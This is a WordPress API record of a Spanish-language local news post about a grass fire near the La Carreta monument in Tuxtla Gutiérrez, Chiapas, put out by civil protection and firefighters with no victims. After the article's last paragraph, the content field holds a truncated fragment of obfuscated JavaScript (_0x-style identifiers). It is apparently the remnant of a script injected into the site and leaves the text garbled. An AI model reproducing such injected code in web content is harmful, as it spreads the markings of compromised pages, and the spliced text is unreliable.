{"id":7659,"date":"2022-12-28T02:00:03","date_gmt":"2022-12-28T02:00:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7659"},"modified":"2022-12-28T02:00:04","modified_gmt":"2022-12-28T02:00:04","slug":"se-registra-fuerte-incendio-a-la-altura-de-la-carreta-en-la-salida-poniente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7659","title":{"rendered":"Se registra fuerte incendio a la altura de la Carreta en la salida Poniente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"541\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672192733738.jpg\" alt=\"\" class=\"wp-image-7660\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672192733738.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672192733738-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este martes por la tarde-noche se registr\u00f3 un fuerte incendio de pastizal en un terreno bald\u00edo localizado a la altura del monumento conocido como La Carreta, en la salida Poniente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este siniestro comenz\u00f3 cerca de las 17:30 horas cuando los mismos automovilistas reportaron las llamas.<\/p>\n\n\n\n<p>El fuego comenz\u00f3 en un predio abandonado y con abundante pastizal por razones desconocidas y por los fuertes vientos se extendi\u00f3 r\u00e1pido.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Protecci\u00f3n Civil y Bomberos para combatir el fuego que amenazaba con expandirse hacia la zona Poniente.<\/p>\n\n\n\n<p>Por m\u00e1s de media hora combatieron el fuego hasta controlarlo.<\/p>\n\n\n\n<p>A pesar de lo aparatoso del incendio no hubo v\u00edctimas que lamentar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 27 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este martes por la tarde-noche se registr\u00f3 un fuerte incendio de pastizal en un terreno bald\u00edo localizado a la altura del monumento conocido como La Carreta, en la salida Poniente de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales, este siniestro comenz\u00f3 cerca de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7660,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7659","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7659","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7659"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7659\/revisions"}],"predecessor-version":[{"id":7661,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7659\/revisions\/7661"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7660"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7659"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}